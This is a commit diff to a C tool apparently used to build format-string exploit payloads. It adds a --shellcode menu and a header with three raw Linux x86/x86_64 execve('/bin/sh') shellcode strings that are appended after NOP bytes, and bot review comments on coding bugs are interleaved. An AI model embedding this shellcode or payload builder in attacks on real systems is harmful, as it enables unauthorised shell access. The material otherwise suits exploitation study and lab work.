| author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 23:43:25 +0000 | 
|---|---|---|
| committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 23:45:21 +0000 | 
| commit | 9756784b22d6be33683b9ecb3040c67685d354f7 (patch) | |
| tree | c06b2df5368a303036cd451b67cdb5f5915ce13b | |
| parent | 4bf33acfc969aa9b45470c481ec303ab7cdc9625 (diff) | |
add the option --shellcode
the user is now able to get a list of common shellcodes to append
between the null bytes and the suffix
closes #1
| -rw-r--r-- | NEWS | 3 | ||||
| -rw-r--r-- | main.c | 67 | ||||
| -rw-r--r-- | shellcodes.h | 84 | 
3 files changed, 145 insertions, 9 deletions
@@ -0,0 +1,3 @@
+01/27/14
+The support of the option --shellcode has been implemented.
+When the user specifies this option, a list of common shellcodes is displayed and the user is able to select one of them.
@@ -24,6 +24,7 @@
 #include <stdio.h>
 #include <getopt.h>
+#include "shellcodes.h"
 static unsigned char payload[4096];
@@ -48,6 +49,11 @@ static char *suffix_g = NULL;
 /* how many NOP bytes (0x90) shall we append before suffix */
 static int suffix_nops_g = 0;
+/* shall we display a menu with the possible shellcodes ? */
+static bool select_shellcode_g = false;
+
+static char *shellcode_g = NULL;
+
     __attribute__((noreturn))
 static void usage(const char *arg0)
 {
@@ -57,7 +63,9 @@ static void usage(const char *arg0)
     fputs(
             "ufs_gen "
             "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
-            "        --override addr --with addr --stackidx idx\n", stderr);
+            "        --override addr --with addr --stackidx idx\n"
+            "        --shellcode\n"
+            , stderr);
     exit(EX_USAGE);
 }
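Review bot: `shellcode_g` is introduced without the comment its sibling globals carry (`suffix_nops_g` is documented right above it in the same hunk); propose `/* bytes of the selected shellcode, appended after the NOP bytes and before the suffix; NULL when none was chosen */`. It is only ever assigned from `common_shellcodes_g[].payload` and never written through, so `static const char *shellcode_g = NULL;` would say so in the type. `bool` needs `<stdbool.h>`; the include hunk above shows only `<stdio.h>` and `<getopt.h>` around the new include, so whether it is already pulled in cannot be confirmed from this diff.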
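Review bot: The new usage line prints `--shellcode` unbracketed, in the same style as the required `--override addr --with addr --stackidx idx` group, while the optional options on the first line are shown in square brackets; since the parse hunk registers it as `no_argument` and nothing requires it, it should read `"        [--shellcode]\n"`. The opening lines of usage sit in the preceding hunk, so only its body is visible here.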
@@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[])
             OPT_PREFIX,
             OPT_SUFFIX,
             OPT_SFX_NOPS,
+            OPT_SHELLCODE,
         };
         static struct option long_options[] = {
-            {"override", required_argument, 0, OPT_OVERRIDE},
-            {"with",     required_argument, 0, OPT_WITH},
-            {"stackidx", required_argument, 0, OPT_STACKIDX},
-            {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
-            {"prefix",   required_argument, 0, OPT_PREFIX},
-            {"suffix",   required_argument, 0, OPT_SUFFIX},
-            {"sfxnops",  required_argument, 0, OPT_SFX_NOPS},
+            {"override",  required_argument, 0, OPT_OVERRIDE},
+            {"with",      required_argument, 0, OPT_WITH},
+            {"stackidx",  required_argument, 0, OPT_STACKIDX},
+            {"addrsize",  required_argument, 0, OPT_ADDR_SIZE},
+            {"prefix",    required_argument, 0, OPT_PREFIX},
+            {"suffix",    required_argument, 0, OPT_SUFFIX},
+            {"sfxnops",   required_argument, 0, OPT_SFX_NOPS},
+            {"shellcode", no_argument,       0, OPT_SHELLCODE},
         };
         int option_index;
@@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[])
             case OPT_SFX_NOPS:
                 suffix_nops_g = atoi(optarg);
                 break;
+            case OPT_SHELLCODE:
+                select_shellcode_g = true;
+                break;
             default:
                 /*
                  * we must have accessed an option which we do not have
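Review bot: The rewritten `long_options[]` table ends with the new `{"shellcode", no_argument, 0, OPT_SHELLCODE},` entry and the context line `};` follows immediately, so there is no all-zero terminator; getopt_long requires the last element to be zero-filled, and without it an unrecognised `--xyz` on the command line makes getopt_long compare against memory past the end of the array. Add `{0, 0, 0, 0}` as the final element of the initialiser. If the sentinel exists on a line that the hunk does not show, disregard, but the visible context leaves no room for one. parse_arguments begins and ends outside this hunk.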
@@ -198,6 +211,30 @@ int main(int argc, char *argv[])
         usage(argv[0]);
     }
+    if (select_shellcode_g) {
+        for (;;) {
+            char buffer[256];
+            int sel;
+
+            /* display the name of the common shellcodes */
+            for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
+                fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
+            }
+            fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);
+
+            if (fgets(buffer, sizeof(buffer), stdin) == NULL)
+                break;
+
+            /* check if the selection is valid */
+            sel = atoi(buffer);
+            if (sel <= 0 || sel > SHELLCODE_COUNT)
+                continue;
+
+            shellcode_g = common_shellcodes_g[sel - 1].payload;
+            break;
+        }
+    }
+
     if (prefix_g != NULL) {
         int len_pfx = strlen(prefix_g);
         int mod_len_pfx = len_pfx % address_size_g;
@@ -242,11 +279,23 @@ int main(int argc, char *argv[])
         ++idx_stack_g;
     }
-    fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+    /* append the NOP bytes */
+    if (suffix_nops_g > 0) {
+        fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+    }
     for (int nop = 0; nop < suffix_nops_g; ++nop) {
         payload[i++] = '\x90';
     }
+    /* append the shellcode */
+    if (shellcode_g != NULL) {
+        fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
+        int len_shellcode = strlen(shellcode_g);
+
+        memcpy(payload + i, shellcode_g, len_shellcode);
+        i += len_shellcode;
+    }
+
     if (suffix_g != NULL) {
         fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
         int len_suffix = strlen(suffix_g);
diff --git a/shellcodes.h b/shellcodes.h
new file mode 100644
index 0000000..679a0d9
--- /dev/null
+++ b/shellcodes.h
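Review bot: The menu accepts `sel = atoi(buffer)` as a valid choice whenever the leading digits are in range, so an input such as `1x` or `12` followed by a 256+ byte line silently selects an entry (with the rest of an over-long line being read as a second answer on the next pass). Parse with `strtol` and require the line to end after the number: `char *end; long v = strtol(buffer, &end, 10); if (end == buffer || (*end != '\n' && *end != '\0') || v <= 0 || v > SHELLCODE_COUNT) continue;` then `sel = (int)v;`. The `break` on `fgets` returning NULL treats a read error the same as CTRL-D, which matches the prompt text, so that part is fine. main begins before this hunk and continues past it.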
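Review bot: In the second hunk of main (`@@ -242,11 +279,23 @@`) the new `memcpy(payload + i, shellcode_g, len_shellcode)` writes into the 4096-byte static `payload` without checking that `i + len_shellcode` fits, so a long prefix/NOP count combined with a shellcode overruns the buffer; add before the copy `if (len_shellcode > (int)sizeof(payload) - i) { fprintf(stderr, "shellcode does not fit in the payload buffer\n"); exit(EXIT_FAILURE); }`. The NOP loop just above and the suffix copy that follows look equally unchecked, but those lines are context rather than part of this change. Measuring the payload with `strlen` also deserves a comment, since it only works while no table entry contains a 0x00 byte; a length field in `shellcode_t` would remove that dependency. main begins and ends outside this hunk.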
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2014 Olivier Gayot
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+
+ * You should have received a copy of the GNU General Public License along
+ * with this program; if not, write to the Free Software Foundation, Inc.,
+ * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+ */
+
+#ifndef SHELLCODES_H
+#define SHELLCODES_H
+
+typedef struct {
+    char *name;
+    char *payload;
+} shellcode_t;
+
+shellcode_t common_shellcodes_g[] = {
+    {
+        .name = "Linux x86\n"
+            "\texecve(\"/bin/sh\", 0, 0)",
+        .payload = "\x68\x2f\x73\x68\xff"
+            "\xfe\x44\x24\x03"
+            "\x68\x2f\x62\x69\x6e"
+            "\x31\xc0"
+            "\xb0\x0b"
+            "\x89\xe3"
+            "\x31\xc9"
+            "\x31\xd2"
+            "\xcd\x80"
+    }, {
+        .name = "Linux x86\n"
+            "\tclose(0); open(\"/dev/tty\", 0); execve(\"/bin/sh\", 0, 0)",
+        .payload = "\x83\xec\x09"
+            "\x31\xc0"
+            "\xb0\x06"
+            "\x31\xdb"
+            "\xcd\x80"
+            "\xc7\x04\x24\x2f\x64\x65\x76"
+            "\xc7\x44\x24\x04\x2f\x74\x74\x79"
+            "\xc0\x6c\x24\x08\x08"
+            "\x31\xc0"
+            "\xb0\x05"
+            "\x89\xe3"
+            "\x31\xc9"
+            "\xcd\x80"
+            "\xc7\x04\x24\x2f\x62\x69\x6e"
+            "\xc7\x44\x24\x04\xff\x2f\x73\x68"
+            "\xb0\x0b"
+            "\x89\xe3"
+            "\xc1\x6b\x04\x08"
+            "\x31\xc9"
+            "\x31\xd2"
+            "\xcd\x80"
+    }, {
+        .name = "Linux x86_64\n"
+            "\texecve(\"/bin/sh\", 0, 0)",
+        .payload = "\x68\x2f\x62\x69\x6e"
+            "\xc7\x44\x24\x04\x2f\x73\x68"
+            "\xff"
+            "\xfe\x44\x24\x07"
+            "\x48\x31\xc0"
+            "\xb0\x3b"
+            "\x48\x89\xe7"
+            "\x48\x31\xf6"
+            "\x48\x31\xd2"
+            "\x0f\x05"
+    },
+};
+
+#define SHELLCODE_COUNT \
+    ((int)(sizeof(common_shellcodes_g) / sizeof(common_shellcodes_g[0])))
+
+
+#endif /* SHELLCODES_H */
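Review bot: `shellcode_t common_shellcodes_g[] = {` is an object definition with external linkage inside a header, so the moment a second translation unit includes shellcodes.h the link fails with a duplicate symbol, and the table is left writable although nothing in the change writes to it. Declare it `static const shellcode_t common_shellcodes_g[] = {` with `const char *name;` and `const char *payload;` in the struct; `SHELLCODE_COUNT` keeps working because `sizeof` is resolved in the including unit, and `shellcode_g` in main.c then has to become `const char *`. Separately, main.c takes the payload length with `strlen`, which is correct for these three entries only because none of them contains a 0x00 byte; a `size_t len` member initialised from `sizeof(literal) - 1` would keep the table safe to extend, and that assumption should at least be stated in a comment on the struct, e.g. `/* payload is NUL-terminated: it must not contain a 0x00 byte, main.c sizes it with strlen */`.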
